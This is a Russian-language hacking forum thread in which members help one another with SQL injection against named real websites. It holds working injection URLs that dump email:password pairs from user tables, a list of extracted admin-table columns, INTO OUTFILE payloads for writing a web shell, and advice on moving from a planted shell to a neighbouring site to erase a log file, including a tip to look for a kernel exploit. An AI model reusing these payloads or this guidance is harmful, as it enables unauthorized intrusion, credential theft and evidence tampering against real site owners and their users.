как можно ещо попробовать вывести в нужном для меня виде?

qaz said:
а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются
тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс
но я столкнулся с такой проблемой,
при такой конструкции concat_ws(0x3a,email,password)
выводит ошибку

PHP:
Illegal mix of collations(binary,COERCIBLE), ( latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,I MPLICIT) foroperation'concat_ws'



как можно ещо попробовать вывести в нужном для меня виде?


unhex(hex(concat_ws(0x3a,email,password)))

er9j6@ said:
unhex(hex(concat_ws(0x3a,email,password)))


непомогло

qaz said:
непомогло


Нужен линк, так сложно определить в чем проблема

er9j6@ said:
Нужен линк, так сложно определить в чем проблема




PHP:
http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhe x(hex(concat_ws(0x3a,email,password)))+from+user+l imit+1,1),floor(rand(0)*2))having+min(0)+or+1--+

qaz said:

PHP:
http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhe x(hex(concat_ws(0x3a,email,password)))+from+user+l imit+1,1),floor(rand(0)*2))having+min(0)+or+1--+





Выводи пока так


http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+pass word+from+user+limit+10,1),floor(rand(0)*2))having +min(0)+or+1--+


и так еще можно:


http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

er9j6@ said:
Выводи пока так
и так еще можно:



о, спасибо, а чё ето за чудо конструкция??

http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

где я могу почитать о том что ето (@x:=0x 00) и тп, означает?

qaz said:
о, спасибо, а чё ето за чудо конструкция??
http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+
где я могу почитать о том что ето (@x:=0x 00) и тп, означает?


http://mysql.ru/docs/man/Variables.html

вопрос технического характера, как отследить HTTPS запрос?

Подскажите, здесь есть уязвимость, или только раскрытие путей:

saturn.net/contacts.php?id=4%27

уж больно пути странные пишет...

Подскажите... есть сайт, есть форма. Фильтр на иньекцию -


Code:
function is_secure($string)
{

//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";

if(@preg_match($pattern,$string)==true) return false;
else
return true;
}


Если делаем так :


Code:


preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?

DeepBlue7 said:
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -

Code:
function is_secure($string)
{

//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";

if(@preg_match($pattern,$string)==true) return false;
else
return true;
}

Если делаем так :

Code:


preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?


нельзя

DarkMaster said:
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...


Только раскрытие путей.

Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:

http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+

http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1

а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки

Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6

Column found: FullName

Column found: id

Column found: isEnabled

Column found: isSuperUser

Column found: Login

Column found: Password

http://www.kupibt.ru/catalogue/ID_19467

А эту как?

shadowrun said:
http://www.kupibt.ru/catalogue/ID_19467
А эту как?


А где ты тут скулю видишь?

Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.

alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.


Смотри версию ядра и ищи сплоит

alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.


/thread296327.html

подскажите как залить шел. если при залитии картинкой он переименовывается

namez2 said:
подскажите как залить шел. если при залитии картинкой он переименовывается


как переименовывается? и как ты заливаешь?

что за cms?

видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...

namez2 said:
видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...


Через такую систему думаю никак, т.к она сама потом переименовывает независимо от того, какое название. Но, возможно, есть функция "переименовать" и т.п

Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?

snet said:
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?


для начала нужно показать нам как именно ты пытаешься это сделать.

Чакэ said:
для начала нужно показать нам как именно ты пытаешься это сделать.


Через скуль инъекцию в пост запросе.


Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --

snet said:
Через скуль инъекцию в пост запросе.

Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --



через еррор-бейсед нельзя залить шелл

Code:
https://ventosavineyardscom.terrasite.com/cart.asp?Add=1+and%201=%28select%20top%201%20table _name%20from%20information.schema.tables%20where%2 0Table_name%20not%20in%20%28%27Events%27,%27schema %27,%27schema%27,%27schema%27,%27schema%27,%27sche ma%27,%27schema%27,%27schema%27,%27schema%27,%27sc hema%27,%27schema%27,%27schema%27,%27schema%27%29% 29

No admin table?

Always this error:


Code:
Incorrect syntax near the keyword 'schema'.

Only schema showing, why?

Only schema showing, why?


no information.schema, information_schema must.

sorry for my english

через еррор-бейсед нельзя залить шелл



Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним

Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .

А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.

snet


1 and (select 1 into outfile '/путь/шелл.php' lines terminated by "")--

KolosJey said:
Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним
Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .
А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.
snet




Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1

Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.

Expl0ited said:

Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1
Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.


Ну если МОА не видит что ошибка СИНТАКСИСА, тут я бессилен

Запрос рабочий, если всё сделать правильно

Да все норм, вывела ошибка:


Code:
Can't create/write to file '/адрес/файл.php' (Errcode: 13)

Осталось найти папку где есть права.

Спасибо вам обоим.

lightangel, "Thank you" does not smudge on bread. Give me a plus for the reputation

Thank you Snet, worked properly.

Ух. В случае snet, всё элементарно, результат первого запроса, попадает во второй запрос, почему и невозможно раскрутить скуль обычным способом, и приходится использовать вывод в ошибке. Но для залития шелла, достаточно выполнить запрос:

SELECT column FROM table WHERE columns = false UNION SELECT 'test' INTO OUTFILE '/tmp/file.txt'

и при условии если директория доступна на запись для пользователя mysql, то первый запрос выполнится, файл успешно создастся.

Но в примере уважаемого пользователя KolosJey, ничего не получится, т.к. в данном подзапросе and (select 1 into outfile '/tmp/test.txt' lines terminated by "text") использование INTO OUTFILE нарушает синтаксис запроса, о чем и свидетельствует ошибка:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile

Ну если ОБЫЧНЫЕ ПОЛЬЗОВАТЕЛИ не научатся думать СВОЕЙ головой, тут я бессилен.

KolosJey said:
не самой скули, а варианта её эксплуатации.


Я бы даже сказал, варианта вывода на экран результата запроса. Если запрос направлен не на получение информации, а на внесение изменений (в файлы или базу), то без разницы, блайнд или нет.

Людям свойственно иногда ошибаться. Мы же не роботы.

"через еррор-бейсед нельзя залить шелл" (c) Expl0ited

Спасибо что так суетитесь из-за моей проблемы

Действительно, вы оба правы. Можно было обычным способом отправить запрос:

union select 1,2,3,4,"blabla" into outfile "/asd", .

это 3 часовое ковыряние через error_base мне запудрило всю голову и я, почему-то, ограничил себя только им.

Но и вариант который привел КолосДжей тоже сработал. Записал его в свой справочник. Очень познавательно.

Is there a way to inject this?


Code:
http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1

Nothing is working for me.

lightangel said:
Is there a way to inject this?

Code:
http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1

Nothing is working for me.


Читай мануалы.

lightangel

This is the last warning i'm giving to you, don't post basic injections, read tutorials and try to make it out by yourself or i'll just delete your posts

Я пользуюсь Navicat Premium для подключения к mysql как через эту прогу можно залить shell доступа в phpmyadmin нету только такой доступ .

Groove said:
Я пользуюсь Navicat Premium для подключения к mysql как через эту прогу можно залить shell доступа в phpmyadmin нету только такой доступ .


не важно какой интерфейс доступа у вас, если есть File_priv и есть доступная папка на запись то залейте через select + into outfile

Подскажите гуру,

Есть параметр *.php?search=mp3

Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".

В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?

Заранее спасибо за пояснительный ответ.

ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


безобидный нотис.

ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


если показ ошибок не выключено то получишь раскрытие путей и больше ничего - пока не знаешь какие функции используются на серверной части

ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


Это возникает в следствии того, что в переменной _GET['search'] ты передаешь массив, такое поведение никак не запланировано в коде, и эта переменная начинает обрабатывается как обычная строковая переменная, а не как массив, в конце концов значение переменной выводит на экран, по этому и появляется "Array". Использовать это в данном случае, ты никак не сможешь.

На каких сайтах можно попробовать xss и чтобы потом у меня проблем небыло? Я новичок просто. Я заходил в гугл , писал слово чат , находил разные чаты и там где я вижу галимый сайт , по левому построен там можно пробовать , на этих сайтах можно тренироваться и не будет у меня потом проблем?

Vladislav88 said:
На каких сайтах можно попробовать xss и чтобы потом у меня проблем небыло? Я новичок просто. Я заходил в гугл , писал слово чат , находил разные чаты и там где я вижу галимый сайт , по левому построен там можно пробовать , на этих сайтах можно тренироваться и не будет у меня потом проблем?


Конечно будут! Безопасно, если ты развернешь сайт у себя на компе и будешь тренироваться на нем!